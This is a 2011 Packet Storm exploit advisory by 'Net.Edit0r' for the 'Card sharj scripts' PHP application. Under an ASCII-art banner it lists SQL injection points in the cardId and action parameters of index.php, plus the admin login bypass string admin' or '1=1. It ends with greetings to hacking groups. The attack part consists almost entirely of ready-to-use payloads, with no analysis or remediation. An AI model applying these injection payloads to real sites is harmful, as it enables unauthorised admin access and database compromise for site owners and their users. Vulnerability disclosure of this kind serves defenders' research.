Card Sharj SQL Injection

2011-09-16T00:00:00
ID PACKETSTORM:105178
Type packetstorm
Reporter Net.Edit0r
Modified 2011-09-16T00:00:00

Description

                                        
                                            `__________.__ __ ___ ___  
\______ \ | _____ ____ | | __ / | \ ____  
| | _/ | \__ \ _/ ___\| |/ / ______ / ~ \/ ___\  
| | \ |__/ __ \\ \___| < /_____/ \ Y / /_/ >  
|______ /____(____ /\___ >__|_ \ \___|_ /\___ /  
\/ \/ \/ \/ \//_____/  
.ORG  
  
[+] Info=================================================================  
  
[-] Exploit Title: Card sharj scripts Auth Bypass & Sqli Vulnerability  
[-] Author: Net.Edit0r  
[-] Home : Black-HG.Org  
[-] Version: 1.01  
[-] Software Link: http://dl.xn--mgbguh09aqiwi.com/files/Card-sharj-scripts.rar  
[-] Email : Black.hat.tm[at]Gmail[dot]Com / Net.Edit0r[at]att[dot]net  
[-] Date : 2011 / 09 / 16  
[-] CVE : N/A  
[-] Tnx2 : A.Cr0x & 3H34N & 4m!n & Cyrus & tHe.k!ll3r & Mr.XHat & Mikili  
  
[+] Exploit===============================================================  
  
http://127.0.0.1/index.php?cardId=[sql inject]  
  
http://127.0.0.1/index.php?action=[sql inject]  
  
http://localhost/Card-sharj-scripts/admin/index.php  
  
Username & Password: admin' or '1=1  
  
  
[+] Greets===================================================================+  
+  
Ter0R ~ Hurr!c4nE ~ Cru3l.b0y ~ M4hd1 ~ NoL1m1t ~ s3cure.p0rt ,r3v0lter +  
+  
Skitt3r ~ cmaxx ~ SkilleR ~ p0w3rfu7 And All #BHG Members +  
+  
h4ckcity.org , pentesters.ir, mn-team.net [PersianGulf F0r Ever] +  
+  
<3 I Love You iRAN Far==>D <3 +  
+  
=============================================================================+  
`